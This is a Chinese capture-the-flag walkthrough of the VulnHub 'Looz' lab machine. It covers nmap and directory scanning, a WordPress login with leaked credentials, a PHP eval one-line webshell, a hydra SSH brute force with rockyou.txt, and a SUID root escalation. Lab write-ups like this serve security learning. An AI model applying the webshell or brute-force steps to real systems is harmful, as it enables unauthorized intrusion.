靶机概况
下载地址
https://www.vulnhub.com/entry/looz-1,732/靶机截图
信息收集
主机发现
先查看kali的ip地址
使用nmap扫描同网段存活的ip
根据Nmap 的扫描结果与MAC地址,可以确定目标靶机IP 地址为10.4.7.129
端口扫描
命令过程
namp -A -p- 10.4.7.129 -A 显示详细信息 -p- 所有端口 扫描这个地址的端口
端口详情
| PORT | STATE | SERVICE | VERSION |
| 22/tcp | open | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) |
| 80/tcp | open | http | nginx 1.18.0 (Ubuntu) |
| 3306/tcp | open | mysql | MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal |
| 8081/tcp | open | http | Apache httpd 2.4.38 ((Debian)) |
HTTP协议代理服务器常用的端口号包括但不限于:
- 80:这是HTTP协议的标准端口,用于非加密的网页传输。
- 8080:这是HTTP代理服务器常用的替代端口之一,因为标准端口80经常被网络防火墙限制。
- 3128:另一个常用的HTTP代理端口,常被Squid缓存代理服务器使用。
- 8081:有时也用作代理服务器的端口。
- 9098:某些代理服务器可能使用这个端口。
漏洞扫描
没有可用的漏洞
nmap -script=vuln 10.4.7.129
网站信息
网站首页
技术架构
| 组件 | 版本 |
| OS | Linux 5.X |
| Server | nginx/1.18.0 (Ubuntu) |
Web 应用指纹
网站源码
查看网站源码根据提示得知wp的用户 john的密码是 y0uC@n'tbr3akIT 登录网站后台
wp为wordpress
渗透过程
目录扫描
dirsearch -u 10.4.7.129
dirb http://10.4.7.129
访问10.4.7.129/wp-admin 发现登录不上去显示状态码404 由此可知wp没搭建在80端口上
扫描8081端口 wp肯定搭建在8081端口
访问8081端口 10.4.7.129:8081/wp-admin 使用8081的端口会跳转到新页面
将wp.looz.com 加载到/etc/hosts下 (etc/hosts 是操作系统中一个重要的系统文件,它通常位于操作系统的 /etc 目录下。这个文件主要用于映射主机名到 IP 地址,帮助计算机识别网络中的其他设备)
域名映射到 IP 地址
添加完后再重新登入 john的密码是 y0uC@n'tbr3akIT
进入后搜索有用信息
用户gandalf和john都为管理员用户
查看有用信息
这里可以通过编辑这个文件添加一句话木马
<?php @eval($_POST['root'])?>
<?php
php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。
@符号的意思是不报错,即使执行错误,也不报错。
上传时显示错误,自动恢复原状
SSH爆破
hydra -l gandalf -P /usr/share/wordlists/rockyou.txt ssh://10.4.7.129 -V
密码highschoolmusical
SSH登录
ssh gandalf@10.4.7.129
权限提升
SUID(给find命令目录赋予权限,可以在普通用户执行操作)
特殊权限位SUID,对可执行文件有效。当一个可执行文件具有SUID 标志,无论哪个用户运行该文件(命令),谁就具有该文件所有者的权限。
查找find 命令,并赋予这个find 其suid 权限。
发现用chmod更改权限不允许操作
去home目录
进入Private目录
发现shell试着运行
提权成功 shell_testv1.0
寻找flag
ab17850978e36aaf6a2b8808f1ded971
总结
1.九头蛇爆破
2.信息收集
遇到的问题
kali扫不出靶场IP,根据描述靶机建议用VirtualBox打开
代理8081端口wp打不开需要解析将地址添加到/etc/hosts
/etc/hosts这个文件主要用于映射主机名到 IP 地址
扫一扫
1037
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
